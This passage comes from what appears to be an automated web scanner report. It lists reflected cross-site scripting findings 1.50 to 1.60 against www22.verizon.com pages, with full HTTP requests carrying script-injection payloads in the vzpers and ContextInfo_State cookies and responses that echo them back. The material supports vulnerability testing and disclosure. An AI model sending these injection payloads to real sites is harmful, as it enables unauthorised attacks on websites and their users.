Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:06 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head">

<!--<link href="/content/commonfiles/includes/css/masterh
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXCD2EB<SCRIPT>ALERT(1)</SCRIPT>65FE52BE0F1 </DIV>
...[SNIP]...

1.50. http://www22.verizon.com/Residential/Bundles/MarketingLanding/triple_play/triple_play [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/MarketingLanding/triple_play/triple_play

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload bd5c7<script>alert(1)</script>87ad517d5c6 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/MarketingLanding/triple_play/triple_play HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXbd5c7<script>alert(1)</script>87ad517d5c6; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82255
Expires: Mon, 13 Dec 2010 00:40:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:19 GMT
Connection: close
Set-Cookie: ContextInfo_FIOSType=; expires=Sun, 12-Dec-2010 00:40:19 GMT; path=/
Set-Cookie: ContextInfo_HSIType=; expires=Sun, 12-Dec-2010 00:40:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><link href="/content/commonfiles/includes/css/masterhead_new.css" rel=
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXBD5C7<SCRIPT>ALERT(1)</SCRIPT>87AD517D5C6 </DIV>
...[SNIP]...

1.51. http://www22.verizon.com/Residential/Bundles/MarketingLanding/triple_play/triple_play [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/Bundles/MarketingLanding/triple_play/triple_play

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7704a'><script>alert(1)</script>0c0a1d1055b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Bundles/MarketingLanding/triple_play/triple_play HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX7704a'><script>alert(1)</script>0c0a1d1055b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82259
Expires: Mon, 13 Dec 2010 00:40:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:18 GMT
Connection: close
Set-Cookie: ContextInfo_FIOSType=; expires=Sun, 12-Dec-2010 00:40:18 GMT; path=/
Set-Cookie: ContextInfo_HSIType=; expires=Sun, 12-Dec-2010 00:40:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:18 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><link href="/content/commonfiles/includes/css/masterhead_new.css" rel=
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7704A'><SCRIPT>ALERT(1)</SCRIPT>0C0A1D1055B ' />
...[SNIP]...

1.52. http://www22.verizon.com/Residential/DirecTV/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a2038'><script>alert(1)</script>6fe7e5058d3 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXa2038'><script>alert(1)</script>6fe7e5058d3; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65627
Expires: Mon, 13 Dec 2010 00:51:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:51:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:51:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:51:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:51:43 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA2038'><SCRIPT>ALERT(1)</SCRIPT>6FE7E5058D3 ' />
...[SNIP]...

1.53. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 369f2'><script>alert(1)</script>205a2982279 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX369f2'><script>alert(1)</script>205a2982279; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 179413
Expires: Mon, 13 Dec 2010 00:53:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:10 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:10 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:10 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Channels
</title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX369F2'><SCRIPT>ALERT(1)</SCRIPT>205A2982279 ' />
...[SNIP]...

1.54. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Equipment/Equipment.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b99b2'><script>alert(1)</script>6de48e9ca2d was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb99b2'><script>alert(1)</script>6de48e9ca2d; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71413
Expires: Mon, 13 Dec 2010 00:53:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:02 GMT; path=/
Set-Cookie: ContextInfo_Equipment=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:02 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Receivers | HD DVR
</title><meta name="keywords" content="receiver, high definition receiver, hd reciever, dvr receiver, sd rece
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB99B2'><SCRIPT>ALERT(1)</SCRIPT>6DE48E9CA2D ' />
...[SNIP]...

1.55. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77d76'><script>alert(1)</script>715210c4386 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX77d76'><script>alert(1)</script>715210c4386; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 49059
Expires: Mon, 13 Dec 2010 00:53:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:09 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX77D76'><SCRIPT>ALERT(1)</SCRIPT>715210C4386 ' />
...[SNIP]...

1.56. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 9f0b4<script>alert(1)</script>6816be5cec5 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX9f0b4<script>alert(1)</script>6816be5cec5; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50652
Expires: Mon, 13 Dec 2010 00:53:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:11 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:11 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9F0B4<SCRIPT>ALERT(1)</SCRIPT>6816BE5CEC5 </DIV>
...[SNIP]...

1.57. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Packages/Packages.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6358e'><script>alert(1)</script>fe5e6f371f1 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX6358e'><script>alert(1)</script>fe5e6f371f1; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67019
Expires: Mon, 13 Dec 2010 00:52:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:52:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:52:53 GMT; path=/
Set-Cookie: ContextInfo_Language=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:52:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:52:53 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Packages | English
</title><meta name="keywords" content="spanish package, directv bundle package, bundle package, satellite bun
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6358E'><SCRIPT>ALERT(1)</SCRIPT>FE5E6F371F1 ' />
...[SNIP]...

1.58. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Packages/Packages.htm

Issue detail

The value of the vzpers cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5c05"-alert(1)-"1505f8b2e4 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb5c05"-alert(1)-"1505f8b2e4; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65391
Expires: Mon, 13 Dec 2010 00:52:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:52:59 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:52:59 GMT; path=/
Set-Cookie: ContextInfo_Language=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:52:59 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:52:59 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Packages | English
</title><meta name="keywords" content="spanish package, directv bundle package, bundle package, satellite bun
...[SNIP]...

...[SNIP]...

1.59. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Premium/Premium.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89729'><script>alert(1)</script>604e656a2de was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX89729'><script>alert(1)</script>604e656a2de; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84130
Expires: Mon, 13 Dec 2010 00:53:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:03 GMT; path=/
Set-Cookie: ContextInfo_DTVPremium=; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:53:03 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Premiums
</title><meta name="keywords" content="channels, premium programming, sports packages, movie packages, premium packages
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX89729'><SCRIPT>ALERT(1)</SCRIPT>604E656A2DE ' />
...[SNIP]...

1.60. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/EntertainmentOnDemand/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fd5c6'><script>alert(1)</script>77fabe85400 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

